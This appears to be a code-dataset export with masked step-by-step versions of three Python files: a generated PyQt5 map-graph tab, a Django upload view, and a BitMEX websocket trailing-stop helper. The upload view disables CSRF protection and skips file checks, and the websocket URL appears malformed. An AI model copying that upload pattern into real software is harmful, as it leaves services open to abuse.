# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MapGraphTab(object):
def setupUi(self, MapGraphTab):
MapGraphTab.setObjectName("MapGraphTab")
MapGraphTab.resize(1150, 831)
MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))
MapGraphTab.setStyleSheet("background-color: rgb(255, 96, 117);")
self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)
self.gridLayout.setObjectName("gridLayout")
self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)
self.mapView.setUrl(QtCore.QUrl("about:blank"))
self.mapView.setObjectName("mapView")
self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)
self.label = QtWidgets.QLabel(MapGraphTab)
self.label.setMinimumSize(QtCore.QSize(1050, 0))
font = QtGui.QFont()
font.setFamily("Book Antiqua")
font.setPointSize(20)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 2)
self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)
font = QtGui.QFont()
font.setFamily("Book Antiqua")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.extractrMapBtn.setFont(font)
self.extractrMapBtn.setStyleSheet("background-color: rgb(255, 255, 255);")
self.extractrMapBtn.setObjectName("extractrMapBtn")
self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)
self.retranslateUi(MapGraphTab)
QtCore.QMetaObject.connectSlotsByName(MapGraphTab)
def retranslateUi(self, MapGraphTab):
_translate = QtCore.QCoreApplication.translate
MapGraphTab.setWindowTitle(_translate("MapGraphTab", "Map Graph"))
self.label.setText(_translate("MapGraphTab", "Map Graph"))
self.extractrMapBtn.setText(_translate("MapGraphTab", "Extract Video"))
from PyQt5 import QtWebEngineWidgets
|
normal
|
{
"blob_id": "03a13037a9a102397c8be4d9f0f4c5e150965808",
"index": 8666,
"step-1": "<mask token>\n\n\nclass Ui_MapGraphTab(object):\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Ui_MapGraphTab(object):\n\n def setupUi(self, MapGraphTab):\n MapGraphTab.setObjectName('MapGraphTab')\n MapGraphTab.resize(1150, 831)\n MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))\n MapGraphTab.setStyleSheet('background-color: rgb(255, 96, 117);')\n self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)\n self.gridLayout.setObjectName('gridLayout')\n self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)\n self.mapView.setUrl(QtCore.QUrl('about:blank'))\n self.mapView.setObjectName('mapView')\n self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)\n self.label = QtWidgets.QLabel(MapGraphTab)\n self.label.setMinimumSize(QtCore.QSize(1050, 0))\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName('label')\n self.gridLayout.addWidget(self.label, 0, 0, 1, 2)\n self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.extractrMapBtn.setFont(font)\n self.extractrMapBtn.setStyleSheet(\n 'background-color: rgb(255, 255, 255);')\n self.extractrMapBtn.setObjectName('extractrMapBtn')\n self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)\n self.retranslateUi(MapGraphTab)\n QtCore.QMetaObject.connectSlotsByName(MapGraphTab)\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Ui_MapGraphTab(object):\n\n def setupUi(self, MapGraphTab):\n MapGraphTab.setObjectName('MapGraphTab')\n MapGraphTab.resize(1150, 831)\n MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))\n MapGraphTab.setStyleSheet('background-color: rgb(255, 96, 117);')\n self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)\n self.gridLayout.setObjectName('gridLayout')\n self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)\n self.mapView.setUrl(QtCore.QUrl('about:blank'))\n self.mapView.setObjectName('mapView')\n self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)\n self.label = QtWidgets.QLabel(MapGraphTab)\n self.label.setMinimumSize(QtCore.QSize(1050, 0))\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName('label')\n self.gridLayout.addWidget(self.label, 0, 0, 1, 2)\n self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.extractrMapBtn.setFont(font)\n self.extractrMapBtn.setStyleSheet(\n 'background-color: rgb(255, 255, 255);')\n self.extractrMapBtn.setObjectName('extractrMapBtn')\n self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)\n self.retranslateUi(MapGraphTab)\n QtCore.QMetaObject.connectSlotsByName(MapGraphTab)\n\n def retranslateUi(self, MapGraphTab):\n _translate = QtCore.QCoreApplication.translate\n MapGraphTab.setWindowTitle(_translate('MapGraphTab', 'Map Graph'))\n self.label.setText(_translate('MapGraphTab', 'Map Graph'))\n self.extractrMapBtn.setText(_translate('MapGraphTab', 'Extract Video'))\n\n\n<mask token>\n",
"step-4": "from PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_MapGraphTab(object):\n\n def setupUi(self, MapGraphTab):\n MapGraphTab.setObjectName('MapGraphTab')\n MapGraphTab.resize(1150, 831)\n MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))\n MapGraphTab.setStyleSheet('background-color: rgb(255, 96, 117);')\n self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)\n self.gridLayout.setObjectName('gridLayout')\n self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)\n self.mapView.setUrl(QtCore.QUrl('about:blank'))\n self.mapView.setObjectName('mapView')\n self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)\n self.label = QtWidgets.QLabel(MapGraphTab)\n self.label.setMinimumSize(QtCore.QSize(1050, 0))\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName('label')\n self.gridLayout.addWidget(self.label, 0, 0, 1, 2)\n self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.extractrMapBtn.setFont(font)\n self.extractrMapBtn.setStyleSheet(\n 'background-color: rgb(255, 255, 255);')\n self.extractrMapBtn.setObjectName('extractrMapBtn')\n self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)\n self.retranslateUi(MapGraphTab)\n QtCore.QMetaObject.connectSlotsByName(MapGraphTab)\n\n def retranslateUi(self, MapGraphTab):\n _translate = QtCore.QCoreApplication.translate\n MapGraphTab.setWindowTitle(_translate('MapGraphTab', 'Map Graph'))\n self.label.setText(_translate('MapGraphTab', 'Map Graph'))\n self.extractrMapBtn.setText(_translate('MapGraphTab', 'Extract Video'))\n\n\nfrom PyQt5 import QtWebEngineWidgets\n",
"step-5": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'mapGraph.ui'\n#\n# Created by: PyQt5 UI code generator 5.9.2\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nclass Ui_MapGraphTab(object):\n def setupUi(self, MapGraphTab):\n MapGraphTab.setObjectName(\"MapGraphTab\")\n MapGraphTab.resize(1150, 831)\n MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))\n MapGraphTab.setStyleSheet(\"background-color: rgb(255, 96, 117);\")\n self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)\n self.gridLayout.setObjectName(\"gridLayout\")\n self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)\n self.mapView.setUrl(QtCore.QUrl(\"about:blank\"))\n self.mapView.setObjectName(\"mapView\")\n self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)\n self.label = QtWidgets.QLabel(MapGraphTab)\n self.label.setMinimumSize(QtCore.QSize(1050, 0))\n font = QtGui.QFont()\n font.setFamily(\"Book Antiqua\")\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName(\"label\")\n self.gridLayout.addWidget(self.label, 0, 0, 1, 2)\n self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)\n font = QtGui.QFont()\n font.setFamily(\"Book Antiqua\")\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.extractrMapBtn.setFont(font)\n self.extractrMapBtn.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.extractrMapBtn.setObjectName(\"extractrMapBtn\")\n self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)\n\n self.retranslateUi(MapGraphTab)\n QtCore.QMetaObject.connectSlotsByName(MapGraphTab)\n\n def retranslateUi(self, MapGraphTab):\n _translate = QtCore.QCoreApplication.translate\n MapGraphTab.setWindowTitle(_translate(\"MapGraphTab\", \"Map Graph\"))\n self.label.setText(_translate(\"MapGraphTab\", \"Map Graph\"))\n self.extractrMapBtn.setText(_translate(\"MapGraphTab\", \"Extract Video\"))\n\nfrom PyQt5 import QtWebEngineWidgets\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
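A hedged launcher sketch for the generated Ui_MapGraphTab above. pyuic output is normally imported by a host application; the module name mapGraph_ui is an assumption. Importing it also pulls in QtWebEngineWidgets, which must happen before the QApplication is created.

import sys
from PyQt5 import QtWidgets
from mapGraph_ui import Ui_MapGraphTab  # hypothetical module name for the generated file

app = QtWidgets.QApplication(sys.argv)
tab = QtWidgets.QWidget()
ui = Ui_MapGraphTab()
ui.setupUi(tab)                          # builds the map view, label and button on the widget
tab.show()
sys.exit(app.exec_())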
from django import forms
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt
import time
from page.models import Submit, Assignment
class UploadFileForm(forms.ModelForm):
class Meta:
model = Submit
fields = ['email', 'student_no', 'file']
@csrf_exempt
def upload(request):
# TODO: check file size and type
frm = UploadFileForm(request.POST, request.FILES)
if not frm.is_valid():
return JsonResponse({'error': frm.errors})
submit = frm.save(commit=False)
submit.assignment, _ = Assignment.objects.get_or_create(name='HW3')
submit.time = time.time()
submit.save()
res = JsonResponse({'success': True})
if 'application/json' not in request.META['HTTP_ACCEPT']:
# INTERNET EXPLORER!!
res['Content-Type'] = 'text/plain'
return res
|
normal
|
{
"blob_id": "dabc38db6a5c4d97e18be2edc9d4c6203e264741",
"index": 3849,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass UploadFileForm(forms.ModelForm):\n\n\n class Meta:\n model = Submit\n fields = ['email', 'student_no', 'file']\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass UploadFileForm(forms.ModelForm):\n\n\n class Meta:\n model = Submit\n fields = ['email', 'student_no', 'file']\n\n\n@csrf_exempt\ndef upload(request):\n frm = UploadFileForm(request.POST, request.FILES)\n if not frm.is_valid():\n return JsonResponse({'error': frm.errors})\n submit = frm.save(commit=False)\n submit.assignment, _ = Assignment.objects.get_or_create(name='HW3')\n submit.time = time.time()\n submit.save()\n res = JsonResponse({'success': True})\n if 'application/json' not in request.META['HTTP_ACCEPT']:\n res['Content-Type'] = 'text/plain'\n return res\n",
"step-4": "from django import forms\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nimport time\nfrom page.models import Submit, Assignment\n\n\nclass UploadFileForm(forms.ModelForm):\n\n\n class Meta:\n model = Submit\n fields = ['email', 'student_no', 'file']\n\n\n@csrf_exempt\ndef upload(request):\n frm = UploadFileForm(request.POST, request.FILES)\n if not frm.is_valid():\n return JsonResponse({'error': frm.errors})\n submit = frm.save(commit=False)\n submit.assignment, _ = Assignment.objects.get_or_create(name='HW3')\n submit.time = time.time()\n submit.save()\n res = JsonResponse({'success': True})\n if 'application/json' not in request.META['HTTP_ACCEPT']:\n res['Content-Type'] = 'text/plain'\n return res\n",
"step-5": "from django import forms\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nimport time\nfrom page.models import Submit, Assignment\n\n\nclass UploadFileForm(forms.ModelForm):\n class Meta:\n model = Submit\n fields = ['email', 'student_no', 'file']\n\n\n@csrf_exempt\ndef upload(request):\n # TODO: check file size and type\n frm = UploadFileForm(request.POST, request.FILES)\n if not frm.is_valid():\n return JsonResponse({'error': frm.errors})\n\n submit = frm.save(commit=False)\n submit.assignment, _ = Assignment.objects.get_or_create(name='HW3')\n submit.time = time.time()\n submit.save()\n\n res = JsonResponse({'success': True})\n if 'application/json' not in request.META['HTTP_ACCEPT']:\n # INTERNET EXPLORER!!\n res['Content-Type'] = 'text/plain'\n return res\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
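A minimal URL-wiring sketch for the upload view above; the row does not show the project's urls.py, so the page.views module path is hypothetical.

from django.urls import path
from page import views  # assumes the view above lives in page/views.py

urlpatterns = [
    path('upload/', views.upload, name='upload'),
]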
import json
import decimal
import threading
import websocket
from time import sleep
from supervisor.core.utils.math import to_nearest
def find_item_by_keys(keys, table, match_data):
for item in table:
matched = True
for key in keys:
if item[key] != match_data[key]:
matched = False
if matched:
return item
class TrailingShell:
# Don't grow a table larger than this amount. Helps cap memory usage.
MAX_TABLE_LEN = 200
def __init__(self, order, offset: int, tick_size: float, test=True, init_ws=True):
self.tick_size = tick_size
self.exited = False
self.test = test
self.order = order
self.offset = offset
self.last_price = 0
self._min_price = float('inf')
self._max_price = -1
self.initial_price = float('nan')
self.tracking = False
self.ws = None
self.__reset()
if init_ws:
self.connect()
def __del__(self):
self.exit()
def exit(self):
self.exited = True
if self.ws is not None:
self.ws.close()
def __reset(self):
self.data = {}
self.keys = {}
self.exited = False
self._error = None
def get_instrument(self, symbol):
instruments = self.data.get('instrument', None)
if instruments is None:
return None
matching_instruments = [i for i in instruments if i['symbol'] == symbol]
if len(matching_instruments) == 0:
raise Exception("Unable to find instrument or index with symbol: " + symbol)
instrument = matching_instruments[0]
# Turn the 'tickSize' into 'tickLog' for use in rounding
# http://stackoverflow.com/a/6190291/832202
instrument['tickLog'] = decimal.Decimal(str(instrument['tickSize'])).as_tuple().exponent * -1
return instrument
def calculate_new_price(self, extremum) -> float:
if self.order.side == 'Sell':
needed_price = extremum * (1 - self.offset / 100)
else:
needed_price = extremum * (1 + self.offset / 100)
needed_price = to_nearest(needed_price, tickSize=self.tick_size)
return needed_price
@property
def min_price(self):
return self._min_price
@min_price.setter
def min_price(self, value):
if value < self.initial_price:
new_price = self.calculate_new_price(value)
self.order.move(to=new_price)
self._min_price = value
@property
def max_price(self):
return self._max_price
@max_price.setter
def max_price(self, value):
if value > self.initial_price:
new_price = self.calculate_new_price(value)
self.order.move(to=new_price)
self._max_price = value
def stop_trailing(self):
self.tracking = False
def start_trailing(self, initial_price: float):
"""
        :param initial_price: the price after reaching which the order starts trailing
"""
self._max_price = -1
self._min_price = float('inf')
self.initial_price = initial_price
self.tracking = True
def connect(self):
"""Connect to the websocket and initialize data stores."""
symbol = self.order.symbol
if self.test:
host = 'wss://testnet.bitmex.com/realtime'
else:
host = 'wss://bitmex.com/realtime'
# Get WS URL and connect.
        endpoint = f"?subscribe=instrument:{symbol}"  # host already ends in /realtime
ws_url = host + endpoint
self.__connect(ws_url)
# Connected. Wait for partials
self.__wait_for_symbol()
def __connect(self, ws_url):
self.ws = websocket.WebSocketApp(ws_url,
on_message=self.__on_message,
on_close=self.__on_close,
on_open=self.__on_open,
on_error=self.__on_error,
header=[])
self.wst = threading.Thread(target=lambda: self.ws.run_forever())
self.wst.daemon = True
self.wst.start()
# Wait for connect before continuing
conn_timeout = 5
while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout and not self._error:
sleep(1)
conn_timeout -= 1
if not conn_timeout or self._error:
self.exit()
def __wait_for_symbol(self):
while not {'instrument'} <= set(self.data):
sleep(0.1)
def __on_message(self, message):
"""Handler for parsing WS messages."""
message = json.loads(message)
table = message['table'] if 'table' in message else None
action = message['action'] if 'action' in message else None
if 'subscribe' in message:
if not message['success']:
self.error("Unable to subscribe to %s. Error: \"%s\" Please check and restart." %
(message['request']['args'][0], message['error']))
elif 'status' in message:
if message['status'] == 400:
self.error(message['error'])
if message['status'] == 401:
self.error("API Key incorrect, please check and restart.")
elif action:
if table not in self.data:
self.data[table] = []
if table not in self.keys:
self.keys[table] = []
# There are four possible actions from the WS:
# 'partial' - full table image
# 'insert' - new row
# 'update' - update row
# 'delete' - delete row
if action == 'partial':
self.data[table] += message['data']
# Keys are communicated on partials to let you know how to uniquely identify
# an item. We use it for updates.
self.keys[table] = message['keys']
elif action == 'insert':
self.data[table] += message['data']
# Limit the max length of the table to avoid excessive memory usage.
# Don't trim orders because we'll lose valuable state if we do.
if table not in ['order', 'orderBookL2'] and len(self.data[table]) > TrailingShell.MAX_TABLE_LEN:
self.data[table] = self.data[table][(TrailingShell.MAX_TABLE_LEN // 2):]
elif action == 'update':
# Locate the item in the collection and update it.
for updateData in message['data']:
item = find_item_by_keys(self.keys[table], self.data[table], updateData)
if not item:
continue # No item found to update. Could happen before push
# Update this item.
item.update(updateData)
# Remove canceled / filled orders
# if table == 'order' and item['leavesQty'] <= 0:
# self.data[table].remove(item)
elif action == 'delete':
# Locate the item in the collection and remove it.
for deleteData in message['data']:
item = find_item_by_keys(self.keys[table], self.data[table], deleteData)
self.data[table].remove(item)
else:
raise Exception("Unknown action: %s" % action)
instrument = self.get_instrument(symbol=self.order.symbol)
if instrument is not None:
self.last_price = instrument['lastPrice']
if self.tracking:
if self.last_price > self.max_price and self.order.side == 'Sell':
self.max_price = self.last_price
elif self.last_price < self.min_price and self.order.side == 'Buy':
self.min_price = self.last_price
def __on_close(self):
self.exit()
def __on_open(self):
pass
def __on_error(self, error):
if not self.exited:
self.error(error)
def error(self, err):
self.exit()
|
normal
|
{
"blob_id": "ea4ec2e605ab6e8734f7631fe298c93467908b5f",
"index": 9582,
"step-1": "<mask token>\n\n\nclass TrailingShell:\n <mask token>\n\n def __init__(self, order, offset: int, tick_size: float, test=True,\n init_ws=True):\n self.tick_size = tick_size\n self.exited = False\n self.test = test\n self.order = order\n self.offset = offset\n self.last_price = 0\n self._min_price = float('inf')\n self._max_price = -1\n self.initial_price = float('nan')\n self.tracking = False\n self.ws = None\n self.__reset()\n if init_ws:\n self.connect()\n <mask token>\n\n def exit(self):\n self.exited = True\n if self.ws is not None:\n self.ws.close()\n\n def __reset(self):\n self.data = {}\n self.keys = {}\n self.exited = False\n self._error = None\n\n def get_instrument(self, symbol):\n instruments = self.data.get('instrument', None)\n if instruments is None:\n return None\n matching_instruments = [i for i in instruments if i['symbol'] == symbol\n ]\n if len(matching_instruments) == 0:\n raise Exception(\n 'Unable to find instrument or index with symbol: ' + symbol)\n instrument = matching_instruments[0]\n instrument['tickLog'] = decimal.Decimal(str(instrument['tickSize'])\n ).as_tuple().exponent * -1\n return instrument\n\n def calculate_new_price(self, extremum) ->float:\n if self.order.side == 'Sell':\n needed_price = extremum * (1 - self.offset / 100)\n else:\n needed_price = extremum * (1 + self.offset / 100)\n needed_price = to_nearest(needed_price, tickSize=self.tick_size)\n return needed_price\n\n @property\n def min_price(self):\n return self._min_price\n\n @min_price.setter\n def min_price(self, value):\n if value < self.initial_price:\n new_price = self.calculate_new_price(value)\n self.order.move(to=new_price)\n self._min_price = value\n <mask token>\n\n @max_price.setter\n def max_price(self, value):\n if value > self.initial_price:\n new_price = self.calculate_new_price(value)\n self.order.move(to=new_price)\n self._max_price = value\n <mask token>\n\n def start_trailing(self, initial_price: float):\n \"\"\"\n\n :param initial_price: the price after reaching which order will be moving\n \"\"\"\n self._max_price = -1\n self._min_price = float('inf')\n self.initial_price = initial_price\n self.tracking = True\n\n def connect(self):\n \"\"\"Connect to the websocket and initialize data stores.\"\"\"\n symbol = self.order.symbol\n if self.test:\n host = 'wss://testnet.bitmex.com/realtime'\n else:\n host = 'wss://bitmex.com/realtime'\n endpoint = f'realtime?subscribe=instrument:{symbol}'\n ws_url = host + endpoint\n self.__connect(ws_url)\n self.__wait_for_symbol()\n\n def __connect(self, ws_url):\n self.ws = websocket.WebSocketApp(ws_url, on_message=self.\n __on_message, on_close=self.__on_close, on_open=self.__on_open,\n on_error=self.__on_error, header=[])\n self.wst = threading.Thread(target=lambda : self.ws.run_forever())\n self.wst.daemon = True\n self.wst.start()\n conn_timeout = 5\n while (not self.ws.sock or not self.ws.sock.connected\n ) and conn_timeout and not self._error:\n sleep(1)\n conn_timeout -= 1\n if not conn_timeout or self._error:\n self.exit()\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __on_error(self, error):\n if not self.exited:\n self.error(error)\n\n def error(self, err):\n self.exit()\n",
"step-2": "<mask token>\n\n\nclass TrailingShell:\n <mask token>\n\n def __init__(self, order, offset: int, tick_size: float, test=True,\n init_ws=True):\n self.tick_size = tick_size\n self.exited = False\n self.test = test\n self.order = order\n self.offset = offset\n self.last_price = 0\n self._min_price = float('inf')\n self._max_price = -1\n self.initial_price = float('nan')\n self.tracking = False\n self.ws = None\n self.__reset()\n if init_ws:\n self.connect()\n\n def __del__(self):\n self.exit()\n\n def exit(self):\n self.exited = True\n if self.ws is not None:\n self.ws.close()\n\n def __reset(self):\n self.data = {}\n self.keys = {}\n self.exited = False\n self._error = None\n\n def get_instrument(self, symbol):\n instruments = self.data.get('instrument', None)\n if instruments is None:\n return None\n matching_instruments = [i for i in instruments if i['symbol'] == symbol\n ]\n if len(matching_instruments) == 0:\n raise Exception(\n 'Unable to find instrument or index with symbol: ' + symbol)\n instrument = matching_instruments[0]\n instrument['tickLog'] = decimal.Decimal(str(instrument['tickSize'])\n ).as_tuple().exponent * -1\n return instrument\n\n def calculate_new_price(self, extremum) ->float:\n if self.order.side == 'Sell':\n needed_price = extremum * (1 - self.offset / 100)\n else:\n needed_price = extremum * (1 + self.offset / 100)\n needed_price = to_nearest(needed_price, tickSize=self.tick_size)\n return needed_price\n\n @property\n def min_price(self):\n return self._min_price\n\n @min_price.setter\n def min_price(self, value):\n if value < self.initial_price:\n new_price = self.calculate_new_price(value)\n self.order.move(to=new_price)\n self._min_price = value\n <mask token>\n\n @max_price.setter\n def max_price(self, value):\n if value > self.initial_price:\n new_price = self.calculate_new_price(value)\n self.order.move(to=new_price)\n self._max_price = value\n <mask token>\n\n def start_trailing(self, initial_price: float):\n \"\"\"\n\n :param initial_price: the price after reaching which order will be moving\n \"\"\"\n self._max_price = -1\n self._min_price = float('inf')\n self.initial_price = initial_price\n self.tracking = True\n\n def connect(self):\n \"\"\"Connect to the websocket and initialize data stores.\"\"\"\n symbol = self.order.symbol\n if self.test:\n host = 'wss://testnet.bitmex.com/realtime'\n else:\n host = 'wss://bitmex.com/realtime'\n endpoint = f'realtime?subscribe=instrument:{symbol}'\n ws_url = host + endpoint\n self.__connect(ws_url)\n self.__wait_for_symbol()\n\n def __connect(self, ws_url):\n self.ws = websocket.WebSocketApp(ws_url, on_message=self.\n __on_message, on_close=self.__on_close, on_open=self.__on_open,\n on_error=self.__on_error, header=[])\n self.wst = threading.Thread(target=lambda : self.ws.run_forever())\n self.wst.daemon = True\n self.wst.start()\n conn_timeout = 5\n while (not self.ws.sock or not self.ws.sock.connected\n ) and conn_timeout and not self._error:\n sleep(1)\n conn_timeout -= 1\n if not conn_timeout or self._error:\n self.exit()\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __on_error(self, error):\n if not self.exited:\n self.error(error)\n\n def error(self, err):\n self.exit()\n",
"step-3": "<mask token>\n\n\nclass TrailingShell:\n <mask token>\n\n def __init__(self, order, offset: int, tick_size: float, test=True,\n init_ws=True):\n self.tick_size = tick_size\n self.exited = False\n self.test = test\n self.order = order\n self.offset = offset\n self.last_price = 0\n self._min_price = float('inf')\n self._max_price = -1\n self.initial_price = float('nan')\n self.tracking = False\n self.ws = None\n self.__reset()\n if init_ws:\n self.connect()\n\n def __del__(self):\n self.exit()\n\n def exit(self):\n self.exited = True\n if self.ws is not None:\n self.ws.close()\n\n def __reset(self):\n self.data = {}\n self.keys = {}\n self.exited = False\n self._error = None\n\n def get_instrument(self, symbol):\n instruments = self.data.get('instrument', None)\n if instruments is None:\n return None\n matching_instruments = [i for i in instruments if i['symbol'] == symbol\n ]\n if len(matching_instruments) == 0:\n raise Exception(\n 'Unable to find instrument or index with symbol: ' + symbol)\n instrument = matching_instruments[0]\n instrument['tickLog'] = decimal.Decimal(str(instrument['tickSize'])\n ).as_tuple().exponent * -1\n return instrument\n\n def calculate_new_price(self, extremum) ->float:\n if self.order.side == 'Sell':\n needed_price = extremum * (1 - self.offset / 100)\n else:\n needed_price = extremum * (1 + self.offset / 100)\n needed_price = to_nearest(needed_price, tickSize=self.tick_size)\n return needed_price\n\n @property\n def min_price(self):\n return self._min_price\n\n @min_price.setter\n def min_price(self, value):\n if value < self.initial_price:\n new_price = self.calculate_new_price(value)\n self.order.move(to=new_price)\n self._min_price = value\n <mask token>\n\n @max_price.setter\n def max_price(self, value):\n if value > self.initial_price:\n new_price = self.calculate_new_price(value)\n self.order.move(to=new_price)\n self._max_price = value\n <mask token>\n\n def start_trailing(self, initial_price: float):\n \"\"\"\n\n :param initial_price: the price after reaching which order will be moving\n \"\"\"\n self._max_price = -1\n self._min_price = float('inf')\n self.initial_price = initial_price\n self.tracking = True\n\n def connect(self):\n \"\"\"Connect to the websocket and initialize data stores.\"\"\"\n symbol = self.order.symbol\n if self.test:\n host = 'wss://testnet.bitmex.com/realtime'\n else:\n host = 'wss://bitmex.com/realtime'\n endpoint = f'realtime?subscribe=instrument:{symbol}'\n ws_url = host + endpoint\n self.__connect(ws_url)\n self.__wait_for_symbol()\n\n def __connect(self, ws_url):\n self.ws = websocket.WebSocketApp(ws_url, on_message=self.\n __on_message, on_close=self.__on_close, on_open=self.__on_open,\n on_error=self.__on_error, header=[])\n self.wst = threading.Thread(target=lambda : self.ws.run_forever())\n self.wst.daemon = True\n self.wst.start()\n conn_timeout = 5\n while (not self.ws.sock or not self.ws.sock.connected\n ) and conn_timeout and not self._error:\n sleep(1)\n conn_timeout -= 1\n if not conn_timeout or self._error:\n self.exit()\n <mask token>\n <mask token>\n <mask token>\n\n def __on_open(self):\n pass\n\n def __on_error(self, error):\n if not self.exited:\n self.error(error)\n\n def error(self, err):\n self.exit()\n",
"step-4": "<mask token>\n\n\nclass TrailingShell:\n <mask token>\n\n def __init__(self, order, offset: int, tick_size: float, test=True,\n init_ws=True):\n self.tick_size = tick_size\n self.exited = False\n self.test = test\n self.order = order\n self.offset = offset\n self.last_price = 0\n self._min_price = float('inf')\n self._max_price = -1\n self.initial_price = float('nan')\n self.tracking = False\n self.ws = None\n self.__reset()\n if init_ws:\n self.connect()\n\n def __del__(self):\n self.exit()\n\n def exit(self):\n self.exited = True\n if self.ws is not None:\n self.ws.close()\n\n def __reset(self):\n self.data = {}\n self.keys = {}\n self.exited = False\n self._error = None\n\n def get_instrument(self, symbol):\n instruments = self.data.get('instrument', None)\n if instruments is None:\n return None\n matching_instruments = [i for i in instruments if i['symbol'] == symbol\n ]\n if len(matching_instruments) == 0:\n raise Exception(\n 'Unable to find instrument or index with symbol: ' + symbol)\n instrument = matching_instruments[0]\n instrument['tickLog'] = decimal.Decimal(str(instrument['tickSize'])\n ).as_tuple().exponent * -1\n return instrument\n\n def calculate_new_price(self, extremum) ->float:\n if self.order.side == 'Sell':\n needed_price = extremum * (1 - self.offset / 100)\n else:\n needed_price = extremum * (1 + self.offset / 100)\n needed_price = to_nearest(needed_price, tickSize=self.tick_size)\n return needed_price\n\n @property\n def min_price(self):\n return self._min_price\n\n @min_price.setter\n def min_price(self, value):\n if value < self.initial_price:\n new_price = self.calculate_new_price(value)\n self.order.move(to=new_price)\n self._min_price = value\n\n @property\n def max_price(self):\n return self._max_price\n\n @max_price.setter\n def max_price(self, value):\n if value > self.initial_price:\n new_price = self.calculate_new_price(value)\n self.order.move(to=new_price)\n self._max_price = value\n <mask token>\n\n def start_trailing(self, initial_price: float):\n \"\"\"\n\n :param initial_price: the price after reaching which order will be moving\n \"\"\"\n self._max_price = -1\n self._min_price = float('inf')\n self.initial_price = initial_price\n self.tracking = True\n\n def connect(self):\n \"\"\"Connect to the websocket and initialize data stores.\"\"\"\n symbol = self.order.symbol\n if self.test:\n host = 'wss://testnet.bitmex.com/realtime'\n else:\n host = 'wss://bitmex.com/realtime'\n endpoint = f'realtime?subscribe=instrument:{symbol}'\n ws_url = host + endpoint\n self.__connect(ws_url)\n self.__wait_for_symbol()\n\n def __connect(self, ws_url):\n self.ws = websocket.WebSocketApp(ws_url, on_message=self.\n __on_message, on_close=self.__on_close, on_open=self.__on_open,\n on_error=self.__on_error, header=[])\n self.wst = threading.Thread(target=lambda : self.ws.run_forever())\n self.wst.daemon = True\n self.wst.start()\n conn_timeout = 5\n while (not self.ws.sock or not self.ws.sock.connected\n ) and conn_timeout and not self._error:\n sleep(1)\n conn_timeout -= 1\n if not conn_timeout or self._error:\n self.exit()\n <mask token>\n\n def __on_message(self, message):\n \"\"\"Handler for parsing WS 